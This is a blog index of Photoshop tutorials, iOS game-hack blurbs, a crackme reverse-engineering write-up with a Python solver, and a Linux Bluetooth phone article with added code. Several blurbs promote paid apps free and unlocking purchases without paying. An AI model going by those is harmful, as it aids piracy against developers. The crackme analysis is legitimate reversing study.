[Tutorial] Create a Gingerbread Cookie in Photoshop

In this Photoshop tutorial we'll create a yummy gingerbread cookie using custom patterns, textures and layer styles.
I was preparing some gingerbread cookies; they looked so nice that I created one in Photoshop, and the result is quite yummy. Let's jump into the baking process.

[Tutorial] Remove a person or object from image

There are times in a web or graphic designer's colourful and creative life when an object in an image they are working on needs to be removed, for design productivity and graphic enhancement. This Photoshop tutorial shows how to achieve that with the Clone Stamp tool.

6 Ways to use Public Wifi Hotspots Safely

Places like Starbucks, neighborhood cafes, Barnes&Noble, and universities are all jumping on the "free Wi-Fi" bandwagon--hey, it's trendy. As a result, more of us are connecting to these networks without realizing the security risks.


Tips and Tricks for Speeding up your Android Device

Android smartphones and tablets can become slow and sluggish over time. These easy-to-follow tips will help make your device run like new.

[Hack] Max Steel v1.0 No Jailbreak

Hack Max Steel v1.0 without a jailbreak; no jailbreak is required. :) Now you can show off to your jailbroken friends that you completed the whole game without a jailbreak and without a hack!

[Tutorial] Dark Storm Scene Photo Manipulation

In this Photoshop tutorial I will show you how to create a dark storm scene. We will go through the steps of combining different stock images, using brushes, adjusting colours, and building light and shadow properly.

Real Racing 3 Hack For No Jailbreak No Cydia for iPhone/iPad/iPod

This is more for those who are not jailbroken (if there are still people left with stock iDevices), as IAPFree works well in this game.

Need for speed MostWanted No Jailbreak Hack For iPhone/iPod/iPad

Hack Need for Speed Most Wanted with no jailbreak required: it can be hacked without a jailbreak and without any Cydia tweaks, fully checked and working.

Hack Gangstar Vegas Any Version for iPhone/iPad/iPod no jailbreak no cydia

Hack Gangstar Vegas easily with no jailbreak: load the hacked game save file and enjoy the fully hacked game.

Joe The Zombie All Versions Hack For iPhone/iPad/iPod No Jailbreak

Hack Joe the Zombie, all versions, with no jailbreak and no Cydia tweaks required; you can hack the game without jailbreaking the iPhone/iPad/iPod.

[Tutorial] Nocturn Fantasy Photo Manipulation in Photoshop

In this Photoshop tutorial we are going to learn how to create our own portrait of a dreamy fantasy night panorama. We will learn a unique technique for setting the mood, dealing with sharpening images, lighting and selection.

Zombie Farm 2 v2.23 Hack For iPhone/iPad/iPod

Hack Zombie Farm 2 v2.23 with no jailbreak required; you can hack this game without a jailbreak, and even if you are jailbroken you can still hack it without any fuss.

How to Create a Bootable UEFI USB Flash Drive for Installing Windows 7, Windows 8, or Windows 8.1

This tutorial will show you how to create a bootable Windows 7, Windows 8 or Windows 8.1 installation USB flash drive for UEFI from a Windows 7 or Windows 8/8.1 installation ISO or DVD.

Requirements:
  • A USB flash drive of at least 4 GB
  • 64-bit Windows 7 ISO or DVD (to install Windows 7)
  • 64-bit Windows 8 ISO or DVD (to install Windows 8)
  • 64-bit Windows 8.1 Preview ISO or DVD (to install Windows 8.1 Preview)
  • 32-bit is not supported

Hack Brother in Arms 2 Global Front v1.0.8 for iPhone/iPad/iPod

Hack Brothers in Arms 2: Global Front v1.0.8 with no jailbreak required; unlock all weapons and get unlimited coins and medals.

[Tutorial] Creating Light Effects to a Photo

In this Photoshop tutorial we will learn how to add enchantment to an ordinary photo by adding some colourful light effects.

Hack Sheep Happens v1.3 on iPhone/iPad/iPod No Jailbreak

Hack Sheep Happens v1.3 with no jailbreak required; get as many coins as you want.

5 tips to make your Facebook account safer

Help better safeguard your Facebook profile with these 5 quick tips.


Hack Bump Sheep No Jailbreak Cydia

Hack Bump Sheep easily; no jailbreak is required, and all modes and cards will be unlocked.

Don’t Remember Sending That Text? You Might Have Been Asleep

An Increasing Number Of Smartphone Owners Are Texting In Their Sleep

Smartphones have become a major part of many people’s everyday lives. More and more smartphone owners use their devices to text, email, and surf the web throughout the day.

How To Hack Slugterra : Slug it Out v1.3.0 No Jailbreak

You can hack it easily without any kind of jailbreak; just be sure not to sync with your iCloud account.

Tutorial - Flying Girl Photo Manipulation

Make this wonderful image of a flying girl by compositing all the images and painting the girl herself in Photoshop.

[HACK] Suspect in Sight Anniversary Edition ( All Versions )

No jailbreak is required; all you need is iFunbox and the plist file, no special skills. Follow the instructions provided here to hack it.

Top 10 Computer Security Tips

Security tips that everyone should know when doing anything on the internet. They will help you stay safe online and cover what anyone from a computer novice to a professional should know.

How to Create a Breathtakingly Artistic Winter Horse Illustration in Photoshop

Learn how to create this amazing photo manipulation with a variety of blending techniques, custom brushes, and more. This intermediate-advanced tutorial also comes with its own set of raw ink splatter scans so that you can practice creating your own Photoshop brushes. And of course, the full layered PSD is included as well.


How to Hack Candy Crush No Jailbreak

This hack works on old versions of Candy Crush; it will not work on the new version. With the hack you get unlimited lollipops and unlimited hearts, reach level 335 and get 3 stars on every stage. You do not need any special tools except iFunbox.

Free Purchase Hack Of ProTuber No Jailbreak

Hack the ProTuber app easily with this step-by-step tutorial. You do not need a jailbreak, but it also works fine if you are jailbroken. You will be able to unlock the full package and download UNLIMITED videos in HD without paying a single penny.

Abstract Art Design

Designing abstract compositions with various colours, lines and forms is really rewarding work. This form of art has existed since as early as the 19th century and is still widely practised around the world. It may have evolved from early abstract art into modern abstract design, but the way it describes the artist's visual experience still brings beauty and joy to the people who appreciate it.

Hack Plants Vs Zombies 2 in iPhone/iPad/iPod

Hack Plants vs. Zombies 2 without iFile or similar applications: all you need is your iDevice and iFunbox, and you will get a large amount of coins/stars/keys to use until you get tired of them.

Erase All Content and Settings While Jailbroken

Ever wanted to keep the jailbreak while erasing all content and settings? This step-by-step tutorial gives you a fresh start on your jailbroken device without using iTunes and without actually restoring or updating the device.

Beating an SEH/VEH based Crack me through analysis

In this article I will show how to beat an advanced crackme that uses an unusual way to compute the input length and that deliberately raises exceptions, handled by SEH and VEH routines, in order to return values in 32-bit registers such as EAX. The key to beating a crackme is a deep analysis of what it does under the hood, especially when it mixes techniques to confuse, stop or slow down the reverser.


This crackme was taken from a very popular challenge website that I will not name; I edited the strings printed in the interface, in memory, so that the site cannot be identified. I was the 59th person to validate it (validation rate 3%).

Let's start by opening the crackme and see what it expects from us.

It asks us politely to type a password, or to crack it, I guess.

Open your mind and carry on. Now we need a quick look at which routines actually deal with the user input. Let's switch to Immunity Debugger.


You can see that it reads the user input, then calls the address held in EBX, and afterwards decides whether to print the success or the failure message. We are interested in what happens directly after the input is read with scanf, so let's see what EBX holds and step into that call.

EBX does not take us far: the target is just below this code. The instructions it points to are the ones that check the user input and decide whether it is right. The routine is fairly long and splits into four parts, each ending in a JE (jump if equal) instruction, so let's take each part on its own:

1st part – Checking the length:

We can see that DEADBABE is added to 227A65DD, which leaves ESI holding the address of the user input; the next instruction sets the carry flag, which the ADD had already set. The instruction that should catch your attention is at 00CC109D: this is what actually computes the length of the input string. How did I know? I will explain.

You can see that 400 is moved into ECX, and that 227A69D9 is moved into EDI and EBX is then added to it, the result staying in EDI. Before the ADD there is a VERY important instruction, SALC, which sets AL to FF if CF is set and to 00 if CF is clear. In our case CF is set, so AL becomes FF. This matters because SCASB compares AL with the byte at ES:[EDI], and with the REPE prefix it keeps scanning while the bytes are equal, decrementing ECX on every iteration and stopping at the first byte that differs from AL or when ECX reaches zero; ECX therefore bounds the scan, and it was set to 400.

Now check what EDI holds after the ADD: 00CC2497. Follow that value in the dump and you find yourself in front of a run of FF bytes. ECX holds 400, so in theory the scan ends when ECX reaches 00000000; in other words the instruction looks for the first byte different from FF between 00CC2497 and (00CC2497 – 400) = 00CC2097, and if none is found ECX simply ends at 00000000. Following 00CC2097 in the dump you find the following:
Here REPE SCASB stops on the highlighted NULL byte (00), because it differs from FF, and ECX ends up holding the distance from 00CC2097 to the byte before the null. In my case (input 123456) ECX holds 9, counting 0, 1, 2 ... up to 9, which lands on 00CC20A0.

Now that we know how the length is computed, we need the length the crackme expects. At this stage we don't care whether the serial is right; we only want to pass the first condition. The last two lines subtract 0F from ECX and then jump if ZF=1 (no jump if ZF=0); in other words, if ECX is 00000000 after the subtraction the zero flag is set, otherwise it stays clear. So after REPE SCASB ECX must hold 0F, which is 15 in decimal. With the counting above, a 12-character input does it (the final flag is indeed 12 characters long) and the jump is taken.

2nd part – First 4 bytes of the flag:

As the conditional jump was taken, you land directly on the second instruction, LODS DWORD PTR DS:[ESI], which loads the DWORD at DS:[ESI] into EAX. That is the first 4 characters of our input, stored little-endian, so if you typed 1234 EAX holds 34333231 afterwards. Next a DWORD is moved into EDX and EAX is XORed with it; this is almost the same scheme I used in CrackMe#3 of the Hackathon Challenge. The correct value of EAX after the XOR must be 1608030E, so the first DWORD of the flag is 1608030E XOR EDX, that is XOR 1608030E, 5A643059 = 4C6C3357. Reverse the byte order and you have the first 4 bytes of the flag: 57336C4C, which is "W3lL" in ASCII.

Now type W3lL followed by 8 random characters and you will see that ZF is set after the compare and the jump is taken.

3rd part – Second 4 bytes of the flag (SEH):
The first two parts were fun; now for more. Let's look at the instructions:

Like the last part, we land directly on the second instruction, which moves a DWORD from memory into EBX; 1000 is then subtracted from it, so EBX now holds 00CC1530. This is the address of the exception handler that is about to be installed: EBX is pushed, and the new handler is fully registered when ESP is moved into DWORD PTR FS:[0]. After that the second 4 bytes of the user input are loaded into EAX, little-endian, and the value that will XOR EAX is moved into EBX.

Here is where the TRAP is: the INT 1 instruction.

We can see that if we step over this instruction with F8, EIP lands directly on 00CC10DF; so we must not step over it, but let the crackme run as it would outside a debugger. INT 01 is the single-step interrupt: the processor raises it on its own after every instruction when the trap flag (TF) is set. Here it is invoked explicitly from the code while TF is clear, so it never sets TF; it simply raises an exception, which is exactly what the handler just installed is waiting for. Let me explain what happens when INT 1 is reached in normal execution rather than by single-stepping through it. The kernel does not hand control straight back to the faulting code; it delivers the exception to user mode through the exception dispatcher, which calls the vectored handlers first and then walks the SEH chain starting at FS:[0]. The handler receives the thread's saved CONTEXT (EIP, EAX and the flags among others) and is free to modify it; when it returns a continue-execution status, the thread resumes with that modified context. That is the IMPORTANT PART: the registers and flags the code sees after INT 1 are whatever the handler left in the context.

So when PUSH EBX at 00CC10C6 executes it records the current SE handler, that is the code that will deal with an exception. The exception here is triggered by INT 1, execution moves into 00CC1530, and when the handler returns the exception is considered handled and execution continues normally. All you need to do is set a breakpoint on the instruction right after INT 1, because otherwise EIP moves on by 2 and that instruction is skipped. After the exception-handling routine returns you will see that EAX holds a return value that is ADDed to the value EAX held before.

Now let's find that second part of the validation flag. Pretend I didn't already tell you that the value returned in EAX is added to its previous value: all you can see after stepping over INT 1 is that EAX changed. So we need to work out whether the handler moved, added, subtracted or multiplied something into EAX. Rerun the crackme under the debugger and enter, for example, W3lL11119876; the DWORD treated in this part is 31313131 ("1111" in ASCII). Step over LODSD and EAX is now 31313131. As I said, set a bp at 00CC10DD and step over INT 1 with Shift+F8 (so the exception is passed to the program). BUT not yet, because that changes EAX and we still have to identify which arithmetic operation (move, add, subtract, multiply) combines the handler's value with the current EAX. What I did was edit EAX to 00000000 just before executing the interrupt. Then I don't have to brute-force each operation: if it is an ADD, EAX ends up holding the handler's value; if it is a multiplication EAX stays 0; a division gives 0 or an exception; and so on.

After executing the interrupt, EAX holds 21486553. Reverse the byte order and read it as ASCII, since it is printable: 53654821 = SeH!

To be more sure that the operation is an addition, change EAX to 00000001 instead: you get 21486554, which byte-swapped and read as ASCII is TeH!.

Now that we know the value returned by the interrupt, we need the value EAX must hold before the XOR. That's simple: after the XOR, EAX is compared with 18D386D7, and it is XORed with 495F4265, so just before the XOR (and just after INT 1) EAX must hold 518CC4B2 (18D386D7 XOR 495F4265). We also know the interrupt adds 21486553 to EAX, so the right value of EAX after LODSD is 518CC4B2 – 21486553 = 30445F5F, byte-swapped 5F5F4430, in ASCII "__D0". The first 8 characters of the flag are therefore W3lL__D0. Rerun the crackme with the serial W3lL__D09876 and step through to the JE of this part (don't forget the bp): ZF is set and the jump is taken because the comparison succeeded, so those 4 bytes are correct.

4th part – The last 4 bytes of the flag (VEH):
Here are the instructions:

From a general view, these instructions install a Vectored Exception Handler (VEH) whose routine is at the address held in EBX. The nonzero second argument pushed means the handler goes to the very head of the list; it is removed again after a group of instructions that check whether the last DWORD of the user input is correct. Those instructions contain an exception at address 00CC110A.

But first, what is a Vectored Exception Handler? According to MSDN:
– Vectored Exception Handling is new as of Windows XP.
– All information about VEH is stored in the heap.
– Vectored exception handlers are explicitly added by your code, rather than as a byproduct of try/catch statements.
– Handlers aren't tied to a specific function, nor are they tied to a stack frame.

So, to be sure the exception is triggered and handled, put a breakpoint on the first instruction the VEH executes, which is the address that was pushed from EBX. Running on, the last DWORD is again loaded little-endian into EAX, and a value is moved into EBX which will be used for the XOR. But right after that there is a MOV that writes EBX to the DWORD at the memory location pointed to by EBP; when you stop on it you see that EBP holds 00000001, so an exception is raised because writing to that address is impossible. With a bp on the pushed EBX you will see that execution is taken over by the instructions at 00CC1960 (the EBX pushed as argument when creating the VEH). Those routines handle the exception and also return a value in EAX that is added, as in the previous part.

So we need to identify that added value again: change EAX to 00000000 after LODSD, put a breakpoint on 00CC110D and press F9, so the instruction isn't skipped as happened last time. Now look at EAX: it holds D9150F32. So after handling the exception D9150F32 is added to EAX, and we need the value EAX must hold right after the handler returns, namely (D9150F32 + LastFlagDwordLittleEndian).

XOR 8E7632F3 with EBX and you get FA3654A0. So the last DWORD of the flag, little-endian, must be:

FA3654A0 – D9150F32 = 2121456E –> byte-swapped = 6E452121 –> ASCII = nE!!

So the last 4 characters of the flag are nE!!

5th part – Regrouping the 3 parts:

So the complete flag that validates the challenge is W3lL__D0nE!!. Provide it to the crackme and you will see that:
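The whole check, replayed and inverted in Python as an added example (this is not the author's code, and nothing of it comes from the crackme itself): each exception handler becomes a plain addition of the value the author observed with EAX zeroed, and the three target constants are inverted stage by stage. The part-4 XOR key is not printed in the write-up; it is derived here from the stated result 8E7632F3 XOR EBX = FA3654A0. The 12-character length is taken from the author's working value.

```python
"""Added example (not the author's code): replay the crackme's four checks and invert them."""
import struct

MASK = 0xFFFFFFFF

# Constants as read from the debugger session in the write-up.
LEN_EXPECTED = 12                              # part 1: the write-up's working length
XOR1, TARGET1 = 0x5A643059, 0x1608030E         # part 2: EAX ^ EDX == TARGET1
XOR2, TARGET2 = 0x495F4265, 0x18D386D7         # part 3: (EAX + SEH value) ^ EBX == TARGET2
SEH_ADD = 0x21486553                           # part 3: what the SEH handler adds to EAX
VEH_ADD = 0xD9150F32                           # part 4: what the VEH handler adds to EAX
TARGET3 = 0x8E7632F3                           # part 4: compared after the XOR
# The part-4 XOR key is not printed in the write-up; it is derived (assumption) from
# the stated result TARGET3 ^ EBX == 0xFA3654A0.
XOR3 = TARGET3 ^ 0xFA3654A0                    # 0x74406653


def lodsd(buf: bytes, offset: int) -> int:
    """LODS DWORD PTR DS:[ESI]: read 4 bytes little-endian into EAX."""
    return struct.unpack_from("<I", buf, offset)[0]


def as_ascii(dword: int) -> str:
    """Show a register value the way its bytes sit in memory (the write-up's 'big endian')."""
    return struct.pack("<I", dword & MASK).decode("latin-1")


def first_failing_part(serial: bytes) -> int:
    """Return 0 when the serial validates, else the number (1-4) of the first check that fails."""
    if len(serial) != LEN_EXPECTED:
        return 1
    # Part 2: plain XOR against a constant.
    if lodsd(serial, 0) ^ XOR1 != TARGET1:
        return 2
    # Part 3: INT 1 raises an exception; the SEH handler resumes with EAX += SEH_ADD.
    eax = (lodsd(serial, 4) + SEH_ADD) & MASK
    if eax ^ XOR2 != TARGET2:
        return 3
    # Part 4: the write to [EBP]=1 faults; the VEH handler resumes with EAX += VEH_ADD.
    eax = (lodsd(serial, 8) + VEH_ADD) & MASK
    if eax ^ XOR3 != TARGET3:
        return 4
    return 0


def solve() -> bytes:
    """Invert each stage: XOR is its own inverse, the handler additions are undone by subtraction."""
    d1 = TARGET1 ^ XOR1
    d2 = ((TARGET2 ^ XOR2) - SEH_ADD) & MASK
    d3 = ((TARGET3 ^ XOR3) - VEH_ADD) & MASK
    return struct.pack("<III", d1, d2, d3)


if __name__ == "__main__":
    flag = solve()
    print(flag.decode(), "validates:", first_failing_part(flag) == 0)
    print("handler value seen with EAX=0:", as_ascii(SEH_ADD))
```

`first_failing_part` reports which stage rejects a candidate, which is the same information the debugger gives you one JE at a time; `solve` is the closed-form inversion, and the two agree on the flag recovered above.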

Finally, this was a really GOOD crackme that I enjoyed analysing and cracking, because it uses several exception handlers that return values which are then added, and a very interesting method of checking the length.


Create Bokeh Heart Effect

Create a wonderful bokeh effect with a heart shape and a nice blue background for an illustration. This design can also be used in other compositions to bring more attention and focus to the subject image.

Add a tattoo to an image and bring it to life

Sometimes inspiration doesn't come when you need it, so while looking around for it I found this image. I thought it was a nice image and a good subject for a new tutorial.
This tutorial won't take you more than 30 minutes and will show you how to use the Clone Tool, Brush Tool and Pen Tool, and how to apply lighting effects.

Fix app crash in your iPhone/iPad/iPod downloaded through Kuaiyong

So you installed an application through Kuaiyong and it will not run? You can now fix the problem of the app constantly opening and closing on your iPhone/iPad/iPod.

How to install apps on iPhone/iPad/iPod Free No Jailbreak

So you want all the expensive apps without paying for them? You can get them without any problems and tell your friends you prefer buying applications to jailbreaking your iDevice. Just follow this tutorial and the apps will behave as if you had purchased them. One warning though: never buy an in-app purchase in an application installed this way.

How to Record or Answer Phone Calls On iPhone?

Have you missed calls on your iPhone while busy working on your laptop or PC?
If so, a new Mac app called Dialogue comes to the rescue.
Dialogue alerts you when you get a call on your iPhone, lets you answer it and make calls right from your Mac, and, if that is not enough, lets you record the conversation, something not currently possible on the iPhone itself. (Note: recording conversations may not be legal in some countries.)

Create a Text Effect With Blood In Photoshop

Create a realistic blood text effect using layer styles in Photoshop and some resources available for free on the internet.
A simple step-by-step tutorial to make a scary blood text effect in Photoshop.

How To Hack Mobile Phone

    A mobile phone is a cool gadget to play with, especially when I can run my favourite programming language (no prize for guessing what it is!) on it! That was the logic which made me purchase a Nokia Series 60 smartphone, the N-Gage QD. This article describes a few experiments I did with the mobile - like setting up Bluetooth communication links, writing Python/C code and emulating serial ports.


Bluetooth on Linux

Bluetooth is a short-distance wireless communication standard. It is commonly used to transfer data between PCs and cell phones/PDAs without the hassle of `wired' connections. The hardware which provides Bluetooth connectivity on the PC is a small device called a `USB-Bluetooth dongle' which you plug into a spare USB port of your machine. I approached the local electronics dealer asking for such a device and got one which didn't even have the manufacturer's name printed on it. The driver CD which came with it of course contained only Windows software. Deciding to try my luck, I plugged the device in and booted my system running Fedora Core 3; the bluetooth service was started manually by executing:

sh /etc/init.d/bluetooth start


Here is the output I obtained when running `hciconfig' (which is similar to the `ifconfig' command used to configure TCP/IP network interfaces):

hci0: Type: USB
BD Address: 00:11:B1:07:A2:B5 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING PSCAN ISCAN
RX bytes:378 acl:0 sco:0 events:16 errors:0
TX bytes:309 acl:0 sco:0 commands:16 errors:0


My no-name USB-Bluetooth dongle has been detected and configured properly! The number 00:11:B1:07:A2:B5 is the Bluetooth address of the device.
Detecting the mobile

The next step is to check whether Linux is able to sense the proximity of the mobile. If your phone has bluetooth disabled, enable it and run the following command (on the Linux machine):

hcitool scan


Here is the output obtained on my machine:

Scanning ...
00:0E:6D:9A:57:48 Dijkstra


The `BlueZ' protocol stack running on my GNU/Linux box has `discovered' the Nokia N-Gage sitting nearby and printed its Bluetooth address as well the name which was assigned to it, `Dijkstra'.
Pairing the mobile

For security reasons, some interactions with the mobile require that the device is `paired' with the one it is interacting with. First, store a number (4 or more digits) in the file /etc/bluetooth/pin (say 12345). A longer PIN is worth the typing: with this legacy pairing scheme the link key is derived from the PIN, so a short numeric one can be brute-forced offline by anyone who captured the pairing exchange. Stop and restart the bluetooth service by doing:

sh /etc/init.d/bluetooth stop
sh /etc/init.d/bluetooth start


Now initiate a `pairing' action on the mobile (the phone manual will tell you how this is done). The software on the phone will detect the presence of the Bluetooth-enabled Linux machine and ask for a code - you should enter the very same number which you have stored in /etc/bluetooth/pin on the PC - the pairing process will succeed.
Transferring files

Files can be transferred to/from the Linux machine using a high level protocol called OBEX (standing for OBjectEXchange, originally designed for Infrared links). First, you have to find out whether the mobile supports OBEX based message transfer. Try running the following command on the Linux machine (the number is the bluetooth address of the phone):

sdptool browse 00:0E:6D:9A:57:48


You might get voluminous output - here is part of what I got:

Service Description: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 9
"OBEX" (0x0008)


OBEX is built on top of a lower-level protocol called RFCOMM. The `Object Push' service uses RFCOMM `channel' 9. Let's try to upload a file to the phone; run the following command on the Linux machine:

obex_push 9 00:0e:6d:9a:57:48 a.txt


The phone will respond by asking you whether to accept the message coming over the bluetooth link. The same command, invoked without any option, can be used to receive files sent from the mobile over the bluetooth link (read the corresponding `man' page for more details).
Installing Python

Nokia has recently done a port of Python to the `Series 60' smartphones running the Symbian operating system. The Python interpreter as well as a few important modules are packaged into a single .sis file (somewhat like the Linux RPM file) which can be obtained from http://www.forum.nokia.com/main/0,,034-821,00.html. The file to be installed is named PythonForSeries60_pre_SDK20.SIS. The first step is to transfer this file to the mobile via obex_push. Trying to open the file on the mobile will result in the Nokia installer program running - it will ask you whether to install Python on the limited amount of memory which the phone has or to an additional MMC card (if one is present). Once the installation is over, you will see a not-so-cute Python logo on the main menu of the phone - Figure 1 is a screenshot I took of the main menu.

Running the Python `Hello, World'

You can write Python scripts on the Linux machine and upload them to the mobile with `obex_push'. If you try to open these scripts (on the mobile), the `applications manager' will ask you whether to install the files as Python scripts or not. Once installed as scripts, you can execute them by following the instructions displayed on the screen when you open the `Python' application from the main menu.


The output obtained by installing and running the following script on the mobile:

import appuifw                      # The Series 60 application UI framework
appuifw.app.title = u'Cool Python'  # Title shown in the application's title bar
appuifw.note(u'OK', 'info')         # Pop up an informational note with the text 'OK'


Socket programming

Application programs running on both the phone as well as the Linux machine interface with the Bluetooth protocol stack via the socket API. Listing 1 shows a simple client program running on the mobile which connects with a server running on the Linux machine and sends it a message; the server code is shown in Listing 2.

The Python client program running on the mobile opens a Bluetooth socket and connects to the PC whose device address is specified in the variable `ATHLON'. Once the connection is established, it simply sends a string `Hello, world'.

The server program running on the PC opens a Bluetooth stream socket, binds it to RFCOMM channel 4 and calls `accept' - the server now blocks, waiting for a connection request to arrive from the client. Once the request arrives, `accept' returns a `connected' socket; calling `recv' on that socket gives the server the string which the client transmitted.

The `bacpy' function used in the server program is defined as an inline function in one of the header files being included, so you need not link in any extra library to get the executable. But if you use any of the other Bluetooth utility functions, such as `ba2str', you have to link /usr/lib/libbluetooth.so into your code.

Using PyBlueZ

There is an interesting Python interface to the Bluetooth library in Linux called `PyBlueZ' available for download from http://org.csail.mit.edu/pybluez. It simplifies the process of writing bluetooth socket programs on the Linux machine. Listing 3 shows the Python implementation of the server program described in the previous section.
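As an added example (not Listing 2 or Listing 3 from the article, and not PyBlueZ code), here is the same RFCOMM server written with the Bluetooth socket support in the Python standard library (socket.AF_BLUETOOTH with BTPROTO_RFCOMM, which CPython on Linux provides when built against BlueZ), together with str2ba/ba2str helpers that mirror the libbluetooth conversion functions the text mentions. The channel number 4 and the `Hello, world' message come from the text; BDADDR_ANY, the 1 KiB receive limit and the socketpair used to exercise the receive path are my assumptions.

```python
import re
import socket

# Bind to every local adapter; the channel is the one the article's server uses.
BDADDR_ANY = "00:00:00:00:00:00"
RFCOMM_CHANNEL = 4
MAX_MESSAGE = 1024  # assumed upper bound on what we accept from one client

_BDADDR_RE = re.compile(r"([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}")


def str2ba(text):
    """Convert 'xx:xx:xx:xx:xx:xx' into its 6 raw bytes, like BlueZ's str2ba.

    Anything that is not exactly six hex octets is rejected, so a malformed
    address from a config file or a remote peer fails loudly here rather than
    producing a half-formed address later.
    """
    if not _BDADDR_RE.fullmatch(text):
        raise ValueError("not a Bluetooth device address: %r" % (text,))
    return bytes(int(octet, 16) for octet in text.split(":"))


def ba2str(addr):
    """Inverse of str2ba: 6 raw bytes -> upper-case, colon-separated string."""
    if len(addr) != 6:
        raise ValueError("a Bluetooth device address is exactly 6 bytes")
    return ":".join("%02X" % b for b in addr)


def receive_message(conn, limit=MAX_MESSAGE):
    """Read one message from a connected stream socket.

    The article's client sends a single short string and closes, so we read
    until EOF, but never more than `limit` bytes: a peer that keeps sending
    cannot make the server buffer an unbounded amount of data.
    """
    chunks, got = [], 0
    while got < limit:
        data = conn.recv(limit - got)
        if not data:          # peer closed its side: the message is complete
            break
        chunks.append(data)
        got += len(data)
    return b"".join(chunks)


def open_rfcomm_server(channel=RFCOMM_CHANNEL):
    """Listening RFCOMM socket on `channel`, the socket/bind/listen sequence
    the C server performs on AF_BLUETOOTH + BTPROTO_RFCOMM."""
    srv = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM,
                        socket.BTPROTO_RFCOMM)
    srv.bind((BDADDR_ANY, channel))
    srv.listen(1)
    return srv


def serve_once(channel=RFCOMM_CHANNEL):
    """Accept a single client, like the article's server, and return the
    peer's address string and the message it sent."""
    srv = open_rfcomm_server(channel)
    try:
        conn, (peer_addr, _peer_channel) = srv.accept()
        try:
            return peer_addr, receive_message(conn)
        finally:
            conn.close()
    finally:
        srv.close()


if __name__ == "__main__":
    addr, msg = serve_once()
    print("%s sent %r" % (addr, msg))
```

Run it as root (or with the CAP_NET_BIND_SERVICE-equivalent rights your BlueZ setup requires) on the Linux box while the phone-side client connects to channel 4; the address helpers and receive_message can be exercised without any Bluetooth hardware, which is how the check below uses them.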

Emulating serial links

Programs like `minicom' are used to talk to devices connected over a serial link (say a modem). There is a neat software trick to present a `serial-port-like' view of a bluetooth link so that programs like `minicom' can manipulate the connection effortlessly. Let's try it out.

First, edit /etc/bluetooth/rfcomm.conf so that it looks like the following:

rfcomm0 {
    bind no;
    device 00:0e:6d:9a:57:48;
    channel 1;
    comment "Example Bluetooth device";
}


After stopping and restarting the bluetooth service, run the following command:

rfcomm bind /dev/rfcomm0


You should see a file called `rfcomm0' under /dev after executing the above command. Now, you can set up `minicom' by running:

minicom -m -s


The only thing you need to do is set the serial device to /dev/rfcomm0. Save the new configuration as the default configuration and invoke:

minicom -m


Minicom is now ready to talk to your phone! Type in `AT' and the program will respond with an `OK'. Say you wish to make your phone dial a number. Just type:

atdt 1234567;


There are many other AT commands you can experiment with; try googling for say `mobile phone AT commands' or something of that sort!

After you have finished with your virtual serial port manipulations, you should run:

rfcomm release /dev/rfcomm0


to `release' the serial-bluetooth link.
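As an added example (not from the article), the same AT conversation can be driven from Python over /dev/rfcomm0 instead of typed by hand into minicom. The commands are the standard Hayes ones the text uses (AT, which answers OK, and ATDT<number>; to dial); opening the port in raw mode with tty.setraw, the five-second timeout and the reply strings in the check below are my assumptions.

```python
import os
import select
import time
import tty

# Final result codes a Hayes-style modem ends a reply with.
FINAL_RESULTS = (b"OK", b"ERROR", b"NO CARRIER", b"BUSY", b"NO ANSWER")


def open_rfcomm_tty(path="/dev/rfcomm0"):
    """Open the emulated serial port (path is the one the article binds).

    The port is switched to raw mode so the tty layer neither echoes what
    we write nor waits for a newline before handing us the modem's bytes.
    """
    fd = os.open(path, os.O_RDWR | os.O_NOCTTY)
    tty.setraw(fd)
    return fd


def parse_at_response(buf, command):
    """Interpret the bytes received so far in reply to `command`.

    Returns (result, info_lines): result is the final result code once the
    modem has sent one, otherwise None (keep reading). The modem's echo of
    the command itself and blank lines are dropped from info_lines.
    """
    text = buf.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    info = []
    for line in text.split(b"\n"):
        line = line.strip()
        if not line or line == command:
            continue
        if line in FINAL_RESULTS or line.startswith((b"+CME ERROR", b"+CMS ERROR")):
            return line, info
        info.append(line)
    return None, info


def at_exchange(fd, command, timeout=5.0):
    """Send one AT command (bytes, without the trailing CR) and wait for the
    final result code. A dead link raises TimeoutError instead of hanging,
    which is where a hand-driven minicom session would just sit."""
    os.write(fd, command + b"\r")
    buf = b""
    deadline = time.monotonic() + timeout
    while True:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            raise TimeoutError("no final result code for %r" % (command,))
        ready, _, _ = select.select([fd], [], [], remaining)
        if not ready:
            continue
        chunk = os.read(fd, 256)
        if not chunk:
            raise ConnectionError("serial link closed")
        buf += chunk
        result, info = parse_at_response(buf, command)
        if result is not None:
            return result, info


def dial(fd, number):
    """Voice-dial `number`, the equivalent of typing 'atdt 1234567;' in minicom.

    Only dial characters are accepted, so a number that came from a file or
    a form cannot carry extra AT commands or dial modifiers into the line.
    """
    if not number or any(ch not in "0123456789+*#" for ch in number):
        raise ValueError("not a dialable number: %r" % (number,))
    return at_exchange(fd, b"ATDT" + number.encode("ascii") + b";")


if __name__ == "__main__":
    port = open_rfcomm_tty()
    print(at_exchange(port, b"AT"))
    os.close(port)
```

With the rfcomm device bound as above, `python3 thisfile.py` performs the AT/OK handshake the text describes; the parser and the timeout path work on any file descriptor, so they can be checked against a socket pair standing in for the phone.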

Python over a Bluetooth console

Once you get the serial port emulation working, there is another interesting hack to explore. The Nokia Python distribution comes with a program called `btconsole.py'. On one console of your Linux machine, run the command:

rfcomm listen /dev/rfcomm0


Now run `btconsole.py' on the phone. You will see that after a few seconds, `rfcomm' will respond with a `connected' message. Once you get this message, take another console and run:

minicom -m


What do you see on the screen? A Python interactive interpreter prompt! You can now type in Python code snippets and execute them on the phone on-the-fly! Isn't that cool?

Parting Thought

I was curious to know how Microsoft's Windows XP operating system, famous for its `ease of use', would compare with Linux when it comes to interacting with my N-Gage QD. I installed the Windows driver for my no-name USB Bluetooth dongle and tried to get the Nokia PC Suite up and running on an XP machine - maybe it's because I am far more experienced in GNU/Linux than on MS operating systems, but I found the XP experience far less `friendly' than MS would care to admit. I believe that most of the `user friendliness' of the Microsoft operating system comes from hardware vendors and application developers tightly integrating their products with the platform rather than from any inherent quality of the OS as such.

References

